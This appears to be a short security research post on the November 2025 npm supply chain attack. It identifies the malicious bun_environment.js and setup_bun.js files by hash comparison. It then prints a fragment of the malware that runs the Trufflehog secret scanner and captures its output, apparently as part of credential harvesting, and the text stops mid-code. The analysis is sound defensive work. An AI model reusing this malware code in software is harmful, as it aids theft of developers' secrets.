Regarding the Node Package Manager (npm) supply chain attack that started November 21, 2025, and affected over a thousands of packages, we have collected and identified corresponding hashes to make them publicly available in one single place for easier access.

To achieve the greatest possible coverage, we compared the file hashes of the package versions mentioned by Helixguard with those of the predecessor versions to identify the files containing malicious payloads. We determined the bun_environment.js and the setup_bun.js files to be the most relevant. Two different versions of the bun_environment.js file were encountered.
We have uploaded the relevant files to Malware Bazaar.

Analysis of the two different bun_environment.js files

After processing the two bun_environment.js files, we identified the following differences:
– Some single quotes were changed to double quotes and vice versa
– All variables were renamed
– The file with the hash prefix f099 contains a single line more than the other file

The additional code line of the file with the hash prefix f099 is as follows:

        let _44494 = '';
        let _44495 = '';
        return new Promise((_44496, _44497) => {
            let _44498 = Bun.spawn([this.binaryPath, ..._44492], {
                'cwd': this.config.workingDirectory,
                'stdout': "pipe",
                'stderr': "pipe"
            });
            let _44499 = setTimeout(() => {
                _44498.kill();
                _44497(Error("Trufflehog execution timed out after " + this.config.timeout + 'ms'));
            }, this.config.timeout);
            if (_44498.stdout) {
                _44498.stdout.pipeTo(new WritableStream({
                    'write'(_44500) {
                        _44494 += new TextDecoder().decode(_44500);
                    }
                }));
            }
            if (_44498.stderr) {
                _44498.stderr.pipeTo(new WritableStream({